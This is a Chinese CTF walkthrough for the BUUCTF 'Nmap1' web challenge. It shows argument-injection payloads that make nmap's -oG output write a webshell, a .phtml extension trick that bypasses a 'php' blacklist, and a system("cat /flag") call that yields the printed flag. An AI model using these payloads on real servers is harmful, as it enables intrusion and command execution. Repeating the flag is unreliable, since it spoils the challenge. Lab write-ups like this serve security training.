BUUCTF Web [网鼎杯 2020 朱雀组]Nmap1

[网鼎杯 2020 朱雀组]Nmap1

考点:通过nmap写入一句话木马,并绕过escapeshellarg()与escapeshellcmd()等函数的防护。

启动靶机

BUUCTF Web [网鼎杯 2020 朱雀组]Nmap1_第1张图片

一个nmap在线扫描工具,猜测会有命令执行,输入

127.0.0.1 | whoami

BUUCTF Web [网鼎杯 2020 朱雀组]Nmap1_第2张图片

可以看到带入的语句,‘|’被‘\’转义了 。又测试了';','&','&&',发现这些连接符都被转义了,命令不能执行,尝试能否通过nmap写个马传上去。参考链接:【nmap写入一句话木马】Nmap 

构造语句:

127.0.0.1 | '  -oG shell.php '

BUUCTF Web [网鼎杯 2020 朱雀组]Nmap1_第3张图片

有防护(输入语句中不能含有php),测试黑名单绕过,php3,php5,pHP等,发现后缀名为phtml可绕过限制 

127.0.0.1 | '  -oG shell.phtml '

BUUCTF Web [网鼎杯 2020 朱雀组]Nmap1_第4张图片

应该是传上去了,访问一下shell.phtml 

url传参 

?a=system("cat /flag");

 拿到flag        flag{94b3fc79-3cd4-4c29-97bb-39a76b5cf0e9}

附加:

nmap写shell其他常用的指令:

-oN (标准输出)

-oX (XML输出)

-oS (ScRipT KIdd|3 oUTpuT)

-oG (Grep输出)        (本题使用)

-oA (输出至所有格式)

你可能感兴趣的:(BUUCTF,Web,安全)